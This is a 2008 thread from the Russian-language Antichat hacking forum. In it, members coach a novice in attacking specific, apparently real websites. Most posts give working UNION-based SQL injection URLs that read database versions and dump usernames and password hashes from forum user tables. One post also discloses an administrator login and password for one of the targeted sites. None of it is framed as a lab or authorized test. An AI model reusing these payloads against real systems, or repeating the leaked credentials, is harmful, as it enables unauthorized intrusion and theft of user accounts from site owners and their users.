ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #2381  
Старый 16.06.2008, 01:14
JoN.SmiT
Новичок
Регистрация: 07.05.2008
Сообщений: 9
Провел на форуме:
20371

Репутация: -1
По умолчанию

(= ведь это журнал! там новерное одана таблица те оперу села какя нить пост с кучей новостей типа архива или ещё чё нить!
А вот например как мне просканить на таблицу юзер?
 

  #2382  
Старый 16.06.2008, 01:15
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию

Велемир, терпение надо иметь, а не пытаца найти легкий путь В крайнем случае написать граббер если не хватает терпения 38 таблиц ручками прочекать. И это при том, что первые 16 - системные
 

  #2383  
Старый 16.06.2008, 01:22
JoN.SmiT
Новичок
Регистрация: 07.05.2008
Сообщений: 9
Провел на форуме:
20371

Репутация: -1
По умолчанию

А чёза это кмс?

и как Лимитом запос мутить?

Последний раз редактировалось Constantine; 16.06.2008 в 01:54.. Причина: флейм
 

  #2384  
Старый 16.06.2008, 01:31
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021

Репутация: 1879


По умолчанию

Там есть таблица be_users. В ней поля:
-uid
-pid
-tstamp
-username
-password
-admin
-usergroup
-email
И ещё до*** и больше. Вот и вытаскивай.
 

  #2385  
Старый 16.06.2008, 01:37
JoN.SmiT
Новичок
Регистрация: 07.05.2008
Сообщений: 9
Провел на форуме:
20371

Репутация: -1
По умолчанию

Покажи запрос плиз
что после http://www.modvlad.ru/photo/?g=-1+union+select+111,222,version(),444,555,666/*
http://www.modvlad.ru/photo/?g=37+union+select+table_name,2,3,4,5,6+from+infor %20mation_schema.tables+limit+38,1/* делал мне для себя надо знать
и как тащить и я вас больше не потревожу! в формате http:// к примеру username плиз оч надо для обучения!

Последний раз редактировалось JoN.SmiT; 16.06.2008 в 01:43..
 

  #2386  
Старый 16.06.2008, 01:44
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122

Репутация: 874
Отправить сообщение для Red_Red1 с помощью ICQ
По умолчанию

На форум
Логин Administrator
Пароль simbol
Есть админка, но в какой таблице пароли хз

Вот тебе запрос для вывода данных юзеров из форума
http://www.modvlad.ru/photo/?g=-1+union+select+111,222,username,user_password,555, 666+from+forum_users/*
 

  #2387  
Старый 16.06.2008, 02:13
JoN.SmiT
Новичок
Регистрация: 07.05.2008
Сообщений: 9
Провел на форуме:
20371

Репутация: -1
По умолчанию

а в нём http://wow.alania.net/ такое проканает?
 

  #2388  
Старый 16.06.2008, 02:21
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122

Репутация: 874
Отправить сообщение для Red_Red1 с помощью ICQ
По умолчанию

Проканает
http://wow.alania.net/gilds.php?guid=-3+union+select+1,version(),3,4,5,6,7,8,9,10,11,12/*
 

  #2389  
Старый 16.06.2008, 02:24
JoN.SmiT
Новичок
Регистрация: 07.05.2008
Сообщений: 9
Провел на форуме:
20371

Репутация: -1
По умолчанию

значит сейчас нада писать вот так
http://wow.alania.net/gilds.php?guid=-3+union+select+111,222,username,user_password/*
 

  #2390  
Старый 16.06.2008, 02:27
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122

Репутация: 874
Отправить сообщение для Red_Red1 с помощью ICQ
По умолчанию

Сейчас нужно идти вот сюда
http://forum.antichat.ru/showthread.php?t=19605
и ЧИТАТЬ ЧИТАТЬ ЧИТАТЬ
а иначе всегда будут подобные вопросы.... вот чесно, сам подумай ОТКУДА ТЫ взял что там есть эти поля и ИЗ КАКОЙ таблицы ты выводишь
Удачи!
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ